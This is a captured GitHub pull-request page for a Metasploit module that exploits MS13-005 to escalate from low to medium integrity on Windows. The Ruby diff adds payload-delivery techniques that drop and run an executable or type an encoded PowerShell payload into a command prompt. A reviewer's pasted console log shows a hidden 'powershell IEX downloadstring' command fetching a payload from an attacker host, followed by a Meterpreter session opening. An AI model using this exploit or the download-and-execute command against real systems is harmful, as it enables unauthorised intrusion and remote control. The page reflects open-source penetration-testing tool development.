Skip to content

Exploits MS13-005 - Low Integrity to Medium Integrity Local Priv Esc #2162

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 3 commits into from
Jul 29, 2013
Merged

Exploits MS13-005 - Low Integrity to Medium Integrity Local Priv Esc #2162

Changes from all commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
0329cae
Revert "Fixup psh datastore"
Meatballs1 Jul 29, 2013
9ad99ed
I am a git genius
Meatballs1 Jul 29, 2013
5c7f33a
Merge remote-tracking branch 'origin/ms13-005' into ms13-005
Meatballs1 Jul 29, 2013
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
27 changes: 20 additions & 7 deletions modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -12,10 +12,11 @@
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer
include Msf::Post::File
include Msf::Exploit::FileDropper
include Msf::Post::File

def initialize(info={})
super( update_info( info,
Expand All @@ -31,7 +32,11 @@ def initialize(info={})
affects versions Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, RT.
But Spawning a command prompt with the shortcut key does not work in Vista so you will
have to check if the user is already running a command prompt and set SPAWN_PROMPT
false.
false. The WEB technique will use powershell to download and execute a powershell
encoded payload. The FILE technique will drop an executable to the file system, set it
to medium integrity and execute it. The TYPE technique will attempt to execute a
powershell encoded payload directly from the command line but it may take some time to
complete.
},
'License' => MSF_LICENSE,
'Author' =>
Expand Down Expand Up @@ -61,14 +66,14 @@ def initialize(info={})
register_options(
[
OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]),
OptBool.new('FILESYSTEM', [true, 'Drop payload to filesystem and execute', false])
OptEnum.new('TECHNIQUE', [true, 'Delivery technique', 'WEB', ['WEB','FILE','TYPE']]),
OptString.new('CUSTOM_COMMAND', [false, 'Custom command to type'])

], self.class
)

end

# Refactor this into Post lib with adobe_sandbox_adobecollabsync.rb
# Or use GetToken railgun calls?
def low_integrity_level?
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

weird but looks like it's failing as low integrity check when using from IE low integrity process :( ... testing further

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ensure you are in an IE tab rather than the main IE process which may remain Medium Integrity?

P.S I think it's your code ;)

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'm for sure on IE low integrity process :) see screenshot below, just tested deleting the check and it's working smoothly:

msf exploit(ms13_005_hwnd_broadcast) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:8081/KBjDzppQFxzsmHk
[*] Server started.
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[*] Spawning Low Integrity Cmd Prompt
[*] Bruteforcing Taskbar Position
[+] Spawned Medium Integrity Cmd Prompt
[*] Broadcasting payload command to prompt... I hope the user is asleep!
powershell.exe -w hidden -nop -ep bypass -c IEX ((new-object net.webclient).downloadstring('http://192.168.172.1:8081/KBjDzppQFxzsmHk'))
[*] Executing command...
[*] 192.168.172.172  ms13_005_hwnd_broadcast - Delivering Payload
[*] Sending stage (751104 bytes) to 192.168.172.172
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.172:49291) at 2013-07-26 09:21:41 -0500

Need to dig why it's failing :\

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Would be better to check with the token, but you ran into issues yourself looking at that?

You should check the EEGG setting...

tmp_dir = expand_path("%USERPROFILE%")
cd(tmp_dir)
Expand Down Expand Up @@ -115,6 +120,7 @@ def cleanup
vprint_status("Rehiding window...")
client.railgun.user32.ShowWindow(@hwin, 0)
end
super
end

def exploit
Expand All @@ -127,10 +133,11 @@ def exploit
# hopefully will be "%TEMP%/Low" (IE Low Integrity Process case) where a low
# integrity process can write.
drop_to_fs = false
if datastore["FILESYSTEM"]
if datastore['TECHNIQUE'] == 'FILE'
payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
begin
tmp_dir = expand_path("%TEMP%")
tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
cd(tmp_dir)
print_status("Trying to drop payload to #{tmp_dir}...")
if write_file(payload_file, generate_payload_exe)
Expand All @@ -151,10 +158,16 @@ def exploit
if drop_to_fs
command = "cd #{payload_path} && icacls #{payload_file} /setintegritylevel medium && #{payload_file}"
make_it(command)
elsif datastore['TECHNIQUE'] == 'TYPE'
if datastore['CUSTOM_COMMAND']
command = datastore['CUSTOM_COMMAND']
else
command = cmd_psh_payload(payload.encoded)
end
make_it(command)
else
super
end

end

def primer
Expand Down